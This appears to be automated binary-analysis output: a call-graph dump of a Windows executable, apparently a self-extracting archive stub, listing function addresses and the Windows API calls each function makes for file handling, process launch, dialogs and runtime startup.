_swprintf 51 API calls 24350->24351 24353 17c952 GetFileAttributesW 24351->24353 24352->24346 24353->24350 24354 17c967 MoveFileW 24353->24354 24354->24346 24355 17c97f MoveFileExW 24354->24355 24355->24346 24356->24344 24356->24346 24387 16b991 51 API calls 2 library calls 24356->24387 24357->24346 24360 17d799 __cftof _wcslen 24358->24360 24359 17d9c0 24363 17d9e7 24359->24363 24366 17d9de ShowWindow 24359->24366 24360->24359 24360->24363 24364 17d8a5 24360->24364 24407 171fbb CompareStringW 24360->24407 24363->24346 24404 16a231 24364->24404 24366->24363 24367 17d8d9 ShellExecuteExW 24367->24363 24374 17d8ec 24367->24374 24369 17d8d1 24369->24367 24370 17d925 24409 17dc3b 6 API calls 24370->24409 24371 17d97b CloseHandle 24372 17d989 24371->24372 24373 17d994 24371->24373 24410 171fbb CompareStringW 24372->24410 24373->24359 24374->24370 24374->24371 24376 17d91b ShowWindow 24374->24376 24376->24370 24378 17d93d 24378->24371 24379 17d950 GetExitCodeProcess 24378->24379 24379->24371 24380 17d963 24379->24380 24380->24371 24383 17b31e 24382->24383 24384 17b3f0 ExpandEnvironmentStringsW 24383->24384 24385 17b40d 24383->24385 24384->24385 24385->24346 24386->24346 24387->24356 24388->24346 24389->24346 24390->24346 24392 188e54 24391->24392 24393 188e6c 24392->24393 24394 188e61 24392->24394 24396 188e74 24393->24396 24402 188e7d __dosmaperr 24393->24402 24395 188e06 __vsnwprintf_l 21 API calls 24394->24395 24401 188e69 24395->24401 24399 188dcc _free 20 API calls 24396->24399 24397 188e82 24419 1891a8 20 API calls __dosmaperr 24397->24419 24398 188ea7 HeapReAlloc 24398->24401 24398->24402 24399->24401 24401->24346 24402->24397 24402->24398 24420 187a5e 7 API calls 2 library calls 24402->24420 24411 16a243 24404->24411 24407->24364 24408 16b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24408->24369 24409->24378 24410->24373 24412 17ec50 24411->24412 24413 16a250 GetFileAttributesW 24412->24413 24414 16a261 24413->24414 24415 16a23a 24413->24415 24416 16bb03 GetCurrentDirectoryW 24414->24416 24415->24367 24415->24408 24417 16a275 24416->24417 24417->24415 24418 16a279 GetFileAttributesW 24417->24418 24418->24415 24419->24401 24420->24402 25352 17a440 GdipCloneImage GdipAlloc 25405 183a40 5 API calls _ValidateLocalCookies 25424 191f40 CloseHandle 24444 169a74 24447 169a7e 24444->24447 24445 169b9d SetFilePointer 24446 169bb6 GetLastError 24445->24446 24450 169ab1 24445->24450 24446->24450 24447->24445 24449 169b79 24447->24449 24447->24450 24451 16981a 24447->24451 24449->24445 24452 169833 24451->24452 24454 169e80 79 API calls 24452->24454 24453 169865 24453->24449 24454->24453 25353 161075 84 API calls 25425 161f72 128 API calls __EH_prolog 25354 17a070 10 API calls 25406 17b270 99 API calls 24509 169f7a 24510 169f8f 24509->24510 24511 169f88 24509->24511 24512 169f9c GetStdHandle 24510->24512 24519 169fab 24510->24519 24512->24519 24513 16a003 WriteFile 24513->24519 24514 169fd4 WriteFile 24515 169fcf 24514->24515 24514->24519 24515->24514 24515->24519 24517 16a095 24521 166e98 77 API calls 24517->24521 24519->24511 24519->24513 24519->24514 24519->24515 24519->24517 24520 166baa 78 API calls 24519->24520 24520->24519 24521->24511 25407 188268 55 API calls _free 25427 187f6e 52 API calls 3 library calls 25357 17c793 107 API calls 4 library calls 25359 18b49d 6 API calls _ValidateLocalCookies 25408 17c793 102 API calls 4 library calls 25388 179580 6 API calls 25389 17b18d 78 API calls 25361 17c793 97 API calls 4 library calls 23450 17f3b2 23451 17f3be ___scrt_is_nonwritable_in_current_image 23450->23451 23482 17eed7 23451->23482 23453 17f518 23555 17f838 4 API calls 2 library calls 23453->23555 23454 17f3c5 23454->23453 23457 17f3ef 23454->23457 23456 17f51f 23548 187f58 23456->23548 23468 17f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23457->23468 23493 188aed 23457->23493 23464 17f40e 23466 17f48f 23501 17f953 GetStartupInfoW __cftof 23466->23501 23468->23466 23551 187af4 38 API calls 3 library calls 23468->23551 23469 17f495 23502 188a3e 51 API calls 23469->23502 23472 17f49d 23503 17df1e 23472->23503 23476 17f4b1 23476->23456 23477 17f4b5 23476->23477 23478 17f4be 23477->23478 23553 187efb 28 API calls _abort 23477->23553 23554 17f048 12 API calls ___scrt_uninitialize_crt 23478->23554 23481 17f4c6 23481->23464 23483 17eee0 23482->23483 23557 17f654 IsProcessorFeaturePresent 23483->23557 23485 17eeec 23558 182a5e 23485->23558 23487 17eef1 23492 17eef5 23487->23492 23566 188977 23487->23566 23490 17ef0c 23490->23454 23492->23454 23494 188b04 23493->23494 23495 17fbbc _ValidateLocalCookies 5 API calls 23494->23495 23496 17f408 23495->23496 23496->23464 23497 188a91 23496->23497 23498 188ac0 23497->23498 23499 17fbbc _ValidateLocalCookies 5 API calls 23498->23499 23500 188ae9 23499->23500 23500->23468 23501->23469 23502->23472 23625 170863 23503->23625 23507 17df3d 23674 17ac16 23507->23674 23509 17df46 __cftof 23510 17df59 GetCommandLineW 23509->23510 23511 17dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23510->23511 23512 17df68 23510->23512 23689 164092 23511->23689 23678 17c5c4 23512->23678 23518 17df76 OpenFileMappingW 23522 17dfd6 CloseHandle 23518->23522 23523 17df8f MapViewOfFile 23518->23523 23519 17dfe0 23683 17dbde 23519->23683 23522->23511 23524 17dfa0 __InternalCxxFrameHandler 23523->23524 23525 17dfcd UnmapViewOfFile 23523->23525 23530 17dbde 2 API calls 23524->23530 23525->23522 23532 17dfbc 23530->23532 23531 1790b7 8 API calls 23533 17e0aa DialogBoxParamW 23531->23533 23532->23525 23534 17e0e4 23533->23534 23535 17e0f6 Sleep 23534->23535 23536 17e0fd 23534->23536 23535->23536 23538 17e10b 23536->23538 23722 17ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23536->23722 23539 17e12a DeleteObject 23538->23539 23540 17e146 23539->23540 23541 17e13f DeleteObject 23539->23541 23542 17e177 23540->23542 23547 17e189 23540->23547 23541->23540 23723 17dc3b 6 API calls 23542->23723 23545 17e17d CloseHandle 23545->23547 23546 17e1c3 23552 17f993 GetModuleHandleW 23546->23552 23719 17ac7c 23547->23719 24024 187cd5 23548->24024 23551->23466 23552->23476 23553->23478 23554->23481 23555->23456 23557->23485 23570 183b07 23558->23570 23561 182a67 23561->23487 23563 182a6f 23564 182a7a 23563->23564 23584 183b43 DeleteCriticalSection 23563->23584 23564->23487 23613 18c05a 23566->23613 23569 182a7d 7 API calls 2 library calls 23569->23492 23572 183b10 23570->23572 23573 183b39 23572->23573 23575 182a63 23572->23575 23585 183d46 23572->23585 23590 183b43 DeleteCriticalSection 23573->23590 23575->23561 23576 182b8c 23575->23576 23606 183c57 23576->23606 23580 182baf 23581 182bbc 23580->23581 23612 182bbf 6 API calls ___vcrt_FlsFree 23580->23612 23581->23563 23583 182ba1 23583->23563 23584->23561 23591 183c0d 23585->23591 23588 183d69 23588->23572 23589 183d7e InitializeCriticalSectionAndSpinCount 23589->23588 23590->23575 23592 183c26 23591->23592 23596 183c4f 23591->23596 23592->23596 23598 183b72 23592->23598 23595 183c3b GetProcAddress 23595->23596 23597 183c49 23595->23597 23596->23588 23596->23589 23597->23596 23604 183b7e ___vcrt_FlsGetValue 23598->23604 23599 183bf3 23599->23595 23599->23596 23600 183b95 LoadLibraryExW 23601 183bfa 23600->23601 23602 183bb3 GetLastError 23600->23602 23601->23599 23603 183c02 FreeLibrary 23601->23603 23602->23604 23603->23599 23604->23599 23604->23600 23605 183bd5 LoadLibraryExW 23604->23605 23605->23601 23605->23604 23607 183c0d ___vcrt_FlsGetValue 5 API calls 23606->23607 23608 183c71 23607->23608 23609 183c8a TlsAlloc 23608->23609 23610 182b96 23608->23610 23610->23583 23611 183d08 6 API calls ___vcrt_FlsGetValue 23610->23611 23611->23580 23612->23583 23616 18c073 23613->23616 23615 17eefe 23615->23490 23615->23569 23617 17fbbc 23616->23617 23618 17fbc5 IsProcessorFeaturePresent 23617->23618 23619 17fbc4 23617->23619 23621 17fc07 23618->23621 23619->23615 23624 17fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23621->23624 23623 17fcea 23623->23615 23624->23623 23724 17ec50 23625->23724 23628 1708e7 23630 170c14 GetModuleFileNameW 23628->23630 23735 1875fb 42 API calls __vsnwprintf_l 23628->23735 23629 170888 GetProcAddress 23631 1708a1 23629->23631 23632 1708b9 GetProcAddress 23629->23632 23641 170c32 23630->23641 23631->23632 23634 1708cb 23632->23634 23634->23628 23635 170b54 23635->23630 23636 170b5f GetModuleFileNameW CreateFileW 23635->23636 23637 170b8f SetFilePointer 23636->23637 23638 170c08 CloseHandle 23636->23638 23637->23638 23639 170b9d ReadFile 23637->23639 23638->23630 23639->23638 23642 170bbb 23639->23642 23644 170c94 GetFileAttributesW 23641->23644 23645 170cac 23641->23645 23647 170c5d CompareStringW 23641->23647 23726 16b146 23641->23726 23729 17081b 23641->23729 23642->23638 23646 17081b 2 API calls 23642->23646 23644->23641 23644->23645 23648 170cb7 23645->23648 23650 170cec 23645->23650 23646->23642 23647->23641 23651 170cd0 GetFileAttributesW 23648->23651 23653 170ce8 23648->23653 23649 170dfb 23673 17a64d GetCurrentDirectoryW 23649->23673 23650->23649 23652 16b146 GetVersionExW 23650->23652 23651->23648 23651->23653 23654 170d06 23652->23654 23653->23650 23655 170d73 23654->23655 23656 170d0d 23654->23656 23657 164092 _swprintf 51 API calls 23655->23657 23658 17081b 2 API calls 23656->23658 23659 170d9b AllocConsole 23657->23659 23660 170d17 23658->23660 23661 170df3 ExitProcess 23659->23661 23662 170da8 GetCurrentProcessId AttachConsole 23659->23662 23663 17081b 2 API calls 23660->23663 23740 183e13 23662->23740 23665 170d21 23663->23665 23736 16e617 23665->23736 23666 170dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23666->23661 23669 164092 _swprintf 51 API calls 23670 170d4f 23669->23670 23671 16e617 53 API calls 23670->23671 23672 170d5e 23671->23672 23672->23661 23673->23507 23675 17081b 2 API calls 23674->23675 23676 17ac2a OleInitialize 23675->23676 23677 17ac4d GdiplusStartup SHGetMalloc 23676->23677 23677->23509 23682 17c5ce 23678->23682 23679 17c6e4 23679->23518 23679->23519 23680 171fac CharUpperW 23680->23682 23682->23679 23682->23680 23765 16f3fa 82 API calls 2 library calls 23682->23765 23684 17ec50 23683->23684 23685 17dbeb SetEnvironmentVariableW 23684->23685 23687 17dc0e 23685->23687 23686 17dc36 23686->23511 23687->23686 23688 17dc2a SetEnvironmentVariableW 23687->23688 23688->23686 23766 164065 23689->23766 23692 17b6dd LoadBitmapW 23693 17b6fe 23692->23693 23694 17b70b GetObjectW 23692->23694 23850 17a6c2 FindResourceW 23693->23850 23695 17b71a 23694->23695 23845 17a5c6 23695->23845 23699 17b770 23711 16da42 23699->23711 23701 17b74c 23866 17a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23701->23866 23702 17a6c2 13 API calls 23704 17b73d 23702->23704 23704->23701 23706 17b743 DeleteObject 23704->23706 23705 17b754 23867 17a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23705->23867 23706->23701 23708 17b75d 23868 17a80c 8 API calls 23708->23868 23710 17b764 DeleteObject 23710->23699 23879 16da67 23711->23879 23716 1790b7 24012 17eb38 23716->24012 23720 17acab GdiplusShutdown CoUninitialize 23719->23720 23720->23546 23722->23538 23723->23545 23725 17086d GetModuleHandleW 23724->23725 23725->23628 23725->23629 23727 16b196 23726->23727 23728 16b15a GetVersionExW 23726->23728 23727->23641 23728->23727 23730 17ec50 23729->23730 23731 170828 GetSystemDirectoryW 23730->23731 23732 17085e 23731->23732 23733 170840 23731->23733 23732->23641 23734 170851 LoadLibraryW 23733->23734 23734->23732 23735->23635 23737 16e627 23736->23737 23742 16e648 23737->23742 23741 183e1b 23740->23741 23741->23666 23741->23741 23748 16d9b0 23742->23748 23745 16e645 23745->23669 23746 16e66b LoadStringW 23746->23745 23747 16e682 LoadStringW 23746->23747 23747->23745 23753 16d8ec 23748->23753 23750 16d9cd 23751 16d9e2 23750->23751 23761 16d9f0 26 API calls 23750->23761 23751->23745 23751->23746 23754 16d984 _strncpy 23753->23754 23755 16d904 23753->23755 23754->23750 23757 16d928 23755->23757 23762 171da7 WideCharToMultiByte 23755->23762 23760 16d959 23757->23760 23763 16e5b1 50 API calls __vsnprintf 23757->23763 23764 186159 26 API calls 3 library calls 23760->23764 23761->23751 23762->23757 23763->23760 23764->23754 23765->23682 23767 16407c __vswprintf_c_l 23766->23767 23770 185fd4 23767->23770 23773 184097 23770->23773 23774 1840bf 23773->23774 23775 1840d7 23773->23775 23790 1891a8 20 API calls __dosmaperr 23774->23790 23775->23774 23777 1840df 23775->23777 23792 184636 23777->23792 23778 1840c4 23791 189087 26 API calls __cftof 23778->23791 23782 17fbbc _ValidateLocalCookies 5 API calls 23784 164086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23782->23784 23784->23692 23785 184167 23801 1849e6 51 API calls 3 library calls 23785->23801 23788 1840cf 23788->23782 23789 184172 23802 1846b9 20 API calls _free 23789->23802 23790->23778 23791->23788 23793 1840ef 23792->23793 23794 184653 23792->23794 23800 184601 20 API calls 2 library calls 23793->23800 23794->23793 23803 1897e5 GetLastError 23794->23803 23796 184674 23823 18993a 38 API calls __cftof 23796->23823 23798 18468d 23824 189967 38 API calls __cftof 23798->23824 23800->23785 23801->23789 23802->23788 23804 1897fb 23803->23804 23805 189801 23803->23805 23825 18ae5b 11 API calls 2 library calls 23804->23825 23809 189850 SetLastError 23805->23809 23826 18b136 23805->23826 23809->23796 23812 189830 23814 18981b 23812->23814 23815 189837 23812->23815 23813 189821 23816 18985c SetLastError 23813->23816 23833 188dcc 23814->23833 23840 189649 20 API calls __dosmaperr 23815->23840 23841 188d24 38 API calls _abort 23816->23841 23819 189842 23821 188dcc _free 20 API calls 23819->23821 23822 189849 23821->23822 23822->23809 23822->23816 23823->23798 23824->23793 23825->23805 23831 18b143 __dosmaperr 23826->23831 23827 18b183 23843 1891a8 20 API calls __dosmaperr 23827->23843 23828 18b16e RtlAllocateHeap 23829 189813 23828->23829 23828->23831 23829->23814 23839 18aeb1 11 API calls 2 library calls 23829->23839 23831->23827 23831->23828 23842 187a5e 7 API calls 2 library calls 23831->23842 23834 188e00 __dosmaperr 23833->23834 23835 188dd7 RtlFreeHeap 23833->23835 23834->23813 23835->23834 23836 188dec 23835->23836 23844 1891a8 20 API calls __dosmaperr 23836->23844 23838 188df2 GetLastError 23838->23834 23839->23812 23840->23819 23842->23831 23843->23829 23844->23838 23869 17a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23845->23869 23847 17a5cd 23848 17a5d9 23847->23848 23870 17a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23847->23870 23848->23699 23848->23701 23848->23702 23851 17a6e5 SizeofResource 23850->23851 23852 17a7d3 23850->23852 23851->23852 23853 17a6fc LoadResource 23851->23853 23852->23694 23852->23695 23853->23852 23854 17a711 LockResource 23853->23854 23854->23852 23855 17a722 GlobalAlloc 23854->23855 23855->23852 23856 17a73d GlobalLock 23855->23856 23857 17a7cc GlobalFree 23856->23857 23858 17a74c __InternalCxxFrameHandler 23856->23858 23857->23852 23859 17a754 CreateStreamOnHGlobal 23858->23859 23860 17a7c5 GlobalUnlock 23859->23860 23861 17a76c 23859->23861 23860->23857 23871 17a626 GdipAlloc 23861->23871 23864 17a7b0 23864->23860 23865 17a79a GdipCreateHBITMAPFromBitmap 23865->23864 23866->23705 23867->23708 23868->23710 23869->23847 23870->23848 23872 17a638 23871->23872 23874 17a645 23871->23874 23875 17a3b9 23872->23875 23874->23860 23874->23864 23874->23865 23876 17a3e1 GdipCreateBitmapFromStream 23875->23876 23877 17a3da GdipCreateBitmapFromStreamICM 23875->23877 23878 17a3e6 23876->23878 23877->23878 23878->23874 23880 16da75 __EH_prolog 23879->23880 23881 16daa4 GetModuleFileNameW 23880->23881 23882 16dad5 23880->23882 23883 16dabe 23881->23883 23925 1698e0 23882->23925 23883->23882 23885 16db31 23936 186310 23885->23936 23889 16db44 23891 186310 26 API calls 23889->23891 23890 16db05 23890->23885 23892 16e261 78 API calls 23890->23892 23903 16dd4a 23890->23903 23900 16db56 ___vcrt_FlsGetValue 23891->23900 23892->23890 23893 16dc85 23893->23903 23972 169d70 81 API calls 23893->23972 23897 16dc9f ___std_exception_copy 23898 169bd0 82 API calls 23897->23898 23897->23903 23901 16dcc8 ___std_exception_copy 23898->23901 23900->23893 23900->23903 23950 169e80 23900->23950 23966 169bd0 23900->23966 23971 169d70 81 API calls 23900->23971 23901->23903 23907 16dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 23901->23907 23973 171b84 MultiByteToWideChar 23901->23973 23959 16959a 23903->23959 23904 16e159 23906 16e1de 23904->23906 23979 188cce 26 API calls 2 library calls 23904->23979 23912 16e214 23906->23912 23916 16e261 78 API calls 23906->23916 23907->23903 23907->23904 23920 171da7 WideCharToMultiByte 23907->23920 23974 16e5b1 50 API calls __vsnprintf 23907->23974 23975 186159 26 API calls 3 library calls 23907->23975 23976 188cce 26 API calls 2 library calls 23907->23976 23977 187625 26 API calls 2 library calls 23907->23977 23978 16e27c 78 API calls 23907->23978 23909 16e16e 23980 187625 26 API calls 2 library calls 23909->23980 23911 16e1c6 23981 16e27c 78 API calls 23911->23981 23914 186310 26 API calls 23912->23914 23915 16e22d 23914->23915 23917 186310 26 API calls 23915->23917 23916->23906 23917->23903 23920->23907 23923 16e29e GetModuleHandleW FindResourceW 23924 16da55 23923->23924 23924->23716 23926 1698ea 23925->23926 23927 16994b CreateFileW 23926->23927 23928 16996c GetLastError 23927->23928 23932 1699bb 23927->23932 23982 16bb03 23928->23982 23930 16998c 23931 169990 CreateFileW GetLastError 23930->23931 23930->23932 23931->23932 23934 1699b5 23931->23934 23933 1699ff 23932->23933 23935 1699e5 SetFileTime 23932->23935 23933->23890 23934->23932 23935->23933 23937 186349 23936->23937 23938 18634d 23937->23938 23949 186375 23937->23949 23986 1891a8 20 API calls __dosmaperr 23938->23986 23940 186352 23987 189087 26 API calls __cftof 23940->23987 23941 186699 23943 17fbbc _ValidateLocalCookies 5 API calls 23941->23943 23945 1866a6 23943->23945 23944 18635d 23946 17fbbc _ValidateLocalCookies 5 API calls 23944->23946 23945->23889 23947 186369 23946->23947 23947->23889 23949->23941 23988 186230 5 API calls _ValidateLocalCookies 23949->23988 23951 169ea5 23950->23951 23952 169e92 23950->23952 23953 169eb0 23951->23953 23955 169eb8 SetFilePointer 23951->23955 23952->23953 23989 166d5b 77 API calls 23952->23989 23953->23900 23955->23953 23956 169ed4 GetLastError 23955->23956 23956->23953 23957 169ede 23956->23957 23957->23953 23990 166d5b 77 API calls 23957->23990 23960 1695be 23959->23960 23965 1695cf 23959->23965 23961 1695d1 23960->23961 23962 1695ca 23960->23962 23960->23965 23996 169620 23961->23996 23991 16974e 23962->23991 23965->23923 23967 169bdc 23966->23967 23969 169be3 23966->23969 23967->23900 23969->23967 23970 169785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23969->23970 24011 166d1a 77 API calls 23969->24011 23970->23969 23971->23900 23972->23897 23973->23907 23974->23907 23975->23907 23976->23907 23977->23907 23978->23907 23979->23909 23980->23911 23981->23906 23983 16bb10 _wcslen 23982->23983 23984 16bbb8 GetCurrentDirectoryW 23983->23984 23985 16bb39 _wcslen 23983->23985 23984->23985 23985->23930 23986->23940 23987->23944 23988->23949 23989->23951 23990->23953 23992 169757 23991->23992 23993 169781 23991->23993 23992->23993 24002 16a1e0 23992->24002 23993->23965 23997 16964a 23996->23997 23998 16962c 23996->23998 23999 169669 23997->23999 24010 166bd5 76 API calls 23997->24010 23998->23997 24000 169638 CloseHandle 23998->24000 23999->23965 24000->23997 24003 17ec50 24002->24003 24004 16a1ed DeleteFileW 24003->24004 24005 16a200 24004->24005 24006 16977f 24004->24006 24007 16bb03 GetCurrentDirectoryW 24005->24007 24006->23965 24008 16a214 24007->24008 24008->24006 24009 16a218 DeleteFileW 24008->24009 24009->24006 24010->23999 24011->23969 24015 17eb3d ___std_exception_copy 24012->24015 24013 1790d6 24013->23531 24015->24013 24017 17eb59 24015->24017 24021 187a5e 7 API calls 2 library calls 24015->24021 24016 17f5c9 24023 18238d RaiseException 24016->24023 24017->24016 24022 18238d RaiseException 24017->24022 24020 17f5e6 24021->24015 24022->24016 24023->24020 24025 187ce1 _unexpected 24024->24025 24026 187ce8 24025->24026 24027 187cfa 24025->24027 24060 187e2f GetModuleHandleW 24026->24060 24048 18ac31 EnterCriticalSection 24027->24048 24030 187ced 24030->24027 24061 187e73 GetModuleHandleExW 24030->24061 24035 187d01 24045 187d9f 24035->24045 24047 187d76 24035->24047 24069 1887e0 20 API calls _abort 24035->24069 24036 187de8 24070 192390 5 API calls _ValidateLocalCookies 24036->24070 24037 187dbc 24052 187dee 24037->24052 24039 188a91 _abort 5 API calls 24044 187d8e 24039->24044 24040 188a91 _abort 5 API calls 24040->24045 24044->24040 24049 187ddf 24045->24049 24047->24039 24047->24044 24048->24035 24071 18ac81 LeaveCriticalSection 24049->24071 24051 187db8 24051->24036 24051->24037 24072 18b076 24052->24072 24055 187e1c 24058 187e73 _abort 8 API calls 24055->24058 24056 187dfc GetPEB 24056->24055 24057 187e0c GetCurrentProcess TerminateProcess 24056->24057 24057->24055 24059 187e24 ExitProcess 24058->24059 24060->24030 24062 187e9d GetProcAddress 24061->24062 24063 187ec0 24061->24063 24068 187eb2 24062->24068 24064 187ecf 24063->24064 24065 187ec6 FreeLibrary 24063->24065 24066 17fbbc _ValidateLocalCookies 5 API calls 24064->24066 24065->24064 24067 187cf9 24066->24067 24067->24027 24068->24063 24069->24047 24071->24051 24073 18b09b 24072->24073 24074 18b091 24072->24074 24078 18ac98 24073->24078 24076 17fbbc _ValidateLocalCookies 5 API calls 24074->24076 24077 187df8 24076->24077 24077->24055 24077->24056 24081 18acc4 24078->24081 24082 18acc8 24078->24082 24079 18ace8 24079->24082 24083 18acf4 GetProcAddress 24079->24083 24081->24079 24081->24082 24085 18ad34 24081->24085 24082->24074 24084 18ad04 __dosmaperr 24083->24084 24084->24082 24086 18ad4a 24085->24086 24087 18ad55 LoadLibraryExW 24085->24087 24086->24081 24088 18ad72 GetLastError 24087->24088 24091 18ad8a 24087->24091 24089 18ad7d LoadLibraryExW 24088->24089 24088->24091 24089->24091 24090 18ada1 FreeLibrary 24090->24086 24091->24086 24091->24090 24092 17e5b1 24093 17e578 24092->24093 24095 17e85d 24093->24095 24121 17e5bb 24095->24121 24097 17e86d 24098 17e8ee 24097->24098 24099 17e8ca 24097->24099 24102 17e966 LoadLibraryExA 24098->24102 24103 17e9c7 24098->24103 24105 17e9d9 24098->24105 24115 17ea95 24098->24115 24100 17e7fb DloadReleaseSectionWriteAccess 6 API calls 24099->24100 24101 17e8d5 RaiseException 24100->24101 24116 17eac3 24101->24116 24102->24103 24104 17e979 GetLastError 24102->24104 24103->24105 24107 17e9d2 FreeLibrary 24103->24107 24108 17e9a2 24104->24108 24109 17e98c 24104->24109 24106 17ea37 GetProcAddress 24105->24106 24105->24115 24111 17ea47 GetLastError 24106->24111 24106->24115 24107->24105 24110 17e7fb DloadReleaseSectionWriteAccess 6 API calls 24108->24110 24109->24103 24109->24108 24112 17e9ad RaiseException 24110->24112 24113 17ea5a 24111->24113 24112->24116 24113->24115 24117 17e7fb DloadReleaseSectionWriteAccess 6 API calls 24113->24117 24130 17e7fb 24115->24130 24116->24093 24118 17ea7b RaiseException 24117->24118 24119 17e5bb ___delayLoadHelper2@8 6 API calls 24118->24119 24120 17ea92 24119->24120 24120->24115 24122 17e5c7 24121->24122 24123 17e5ed 24121->24123 24138 17e664 24122->24138 24123->24097 24125 17e5cc 24126 17e5e8 24125->24126 24141 17e78d 24125->24141 24146 17e5ee GetModuleHandleW GetProcAddress GetProcAddress 24126->24146 24129 17e836 24129->24097 24131 17e82f 24130->24131 24132 17e80d 24130->24132 24131->24116 24133 17e664 DloadReleaseSectionWriteAccess 3 API calls 24132->24133 24134 17e812 24133->24134 24135 17e82a 24134->24135 24136 17e78d DloadProtectSection 3 API calls 24134->24136 24149 17e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24135->24149 24136->24135 24147 17e5ee GetModuleHandleW GetProcAddress GetProcAddress 24138->24147 24140 17e669 24140->24125 24142 17e7a2 DloadProtectSection 24141->24142 24143 17e7a8 24142->24143 24144 17e7dd VirtualProtect 24142->24144 24148 17e6a3 VirtualQuery GetSystemInfo 24142->24148 24143->24126 24144->24143 24146->24129 24147->24140 24148->24144 24149->24131 25390 17b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25429 171bbd GetCPInfo IsDBCSLeadByte 25392 17eda7 48 API calls _unexpected 25363 17dca1 DialogBoxParamW 25431 17f3a0 27 API calls 25366 18a4a0 71 API calls _free 25409 18a6a0 31 API calls 2 library calls 25367 1908a0 IsProcessorFeaturePresent 25432 166faa 111 API calls 3 library calls 24293 17e2d7 24294 17e1db 24293->24294 24295 17e85d ___delayLoadHelper2@8 14 API calls 24294->24295 24295->24294 25410 180ada 51 API calls 2 library calls 24297 1610d5 24302 165abd 24297->24302 24303 165ac7 __EH_prolog 24302->24303 24309 16b505 24303->24309 24305 165ad3 24315 165cac GetCurrentProcess GetProcessAffinityMask 24305->24315 24310 16b50f __EH_prolog 24309->24310 24316 16f1d0 82 API calls 24310->24316 24312 16b521 24317 16b61e 24312->24317 24316->24312 24318 16b630 __cftof 24317->24318 24321 1710dc 24318->24321 24324 17109e GetCurrentProcess GetProcessAffinityMask 24321->24324 24325 16b597 24324->24325 24325->24305 25368 17f4d3 20 API calls 24326 17e1d1 14 API calls ___delayLoadHelper2@8 25433 18a3d0 21 API calls 2 library calls 25434 192bd0 VariantClear 24425 17dec2 24426 17decf 24425->24426 24427 16e617 53 API calls 24426->24427 24428 17dedc 24427->24428 24429 164092 _swprintf 51 API calls 24428->24429 24430 17def1 SetDlgItemTextW 24429->24430 24433 17b568 PeekMessageW 24430->24433 24434 17b583 GetMessageW 24433->24434 24435 17b5bc 24433->24435 24436 17b599 IsDialogMessageW 24434->24436 24437 17b5a8 TranslateMessage DispatchMessageW 24434->24437 24436->24435 24436->24437 24437->24435 25395 17b5c0 100 API calls 25435 1777c0 118 API calls 25436 17ffc0 RaiseException _com_error::_com_error CallUnexpected 25413 1762ca 123 API calls __InternalCxxFrameHandler 25371 182cfb 38 API calls 4 library calls 25396 1695f0 80 API calls 25397 17fd4f 9 API calls 2 library calls 25414 165ef0 82 API calls 24456 1898f0 24464 18adaf 24456->24464 24460 189919 24463 189904 24465 18ac98 __dosmaperr 5 API calls 24464->24465 24466 18add6 24465->24466 24467 18adee TlsAlloc 24466->24467 24468 18addf 24466->24468 24467->24468 24469 17fbbc _ValidateLocalCookies 5 API calls 24468->24469 24470 1898fa 24469->24470 24470->24463 24471 189869 GetLastError 24470->24471 24472 189882 24471->24472 24475 189888 24471->24475 24491 18ae5b 11 API calls 2 library calls 24472->24491 24474 18b136 __dosmaperr 17 API calls 24476 18989a 24474->24476 24475->24474 24477 1898df SetLastError 24475->24477 24478 1898a2 24476->24478 24492 18aeb1 11 API calls 2 library calls 24476->24492 24479 1898e8 24477->24479 24482 188dcc _free 17 API calls 24478->24482 24479->24460 24490 189920 11 API calls 24479->24490 24481 1898b7 24481->24478 24483 1898be 24481->24483 24484 1898a8 24482->24484 24493 189649 20 API calls __dosmaperr 24483->24493 24486 1898d6 SetLastError 24484->24486 24486->24479 24487 1898c9 24488 188dcc _free 17 API calls 24487->24488 24489 1898cf 24488->24489 24489->24477 24489->24486 24490->24463 24491->24475 24492->24481 24493->24487 24494 18abf0 24495 18abfb 24494->24495 24497 18ac24 24495->24497 24498 18ac20 24495->24498 24500 18af0a 24495->24500 24507 18ac50 DeleteCriticalSection 24497->24507 24501 18ac98 __dosmaperr 5 API calls 24500->24501 24502 18af31 24501->24502 24503 18af4f InitializeCriticalSectionAndSpinCount 24502->24503 24504 18af3a 24502->24504 24503->24504 24505 17fbbc _ValidateLocalCookies 5 API calls 24504->24505 24506 18af66 24505->24506 24506->24495 24507->24498 25372 1888f0 7 API calls ___scrt_uninitialize_crt 24522 17eae7 24523 17eaf1 24522->24523 24524 17e85d ___delayLoadHelper2@8 14 API calls 24523->24524 24525 17eafe 24524->24525 25373 17f4e7 29 API calls _abort 24527 17b7e0 24528 17b7ea __EH_prolog 24527->24528 24695 161316 24528->24695 24531 17b841 24532 17bf0f 24760 17d69e 24532->24760 24533 17b82a 24533->24531 24536 17b89b 24533->24536 24537 17b838 24533->24537 24540 17b92e GetDlgItemTextW 24536->24540 24546 17b8b1 24536->24546 24541 17b83c 24537->24541 24542 17b878 24537->24542 24538 17bf2a SendMessageW 24539 17bf38 24538->24539 24543 17bf52 GetDlgItem SendMessageW 24539->24543 24544 17bf41 SendDlgItemMessageW 24539->24544 24540->24542 24545 17b96b 24540->24545 24541->24531 24547 16e617 53 API calls 24541->24547 24542->24531 24549 17b95f KiUserCallbackDispatcher 24542->24549 24778 17a64d GetCurrentDirectoryW 24543->24778 24544->24543 24550 17b980 GetDlgItem 24545->24550 24693 17b974 24545->24693 24551 16e617 53 API calls 24546->24551 24552 17b85b 24547->24552 24549->24531 24554 17b9b7 SetFocus 24550->24554 24555 17b994 SendMessageW SendMessageW 24550->24555 24556 17b8ce SetDlgItemTextW 24551->24556 24800 16124f SHGetMalloc 24552->24800 24553 17bf82 GetDlgItem 24558 17bfa5 SetWindowTextW 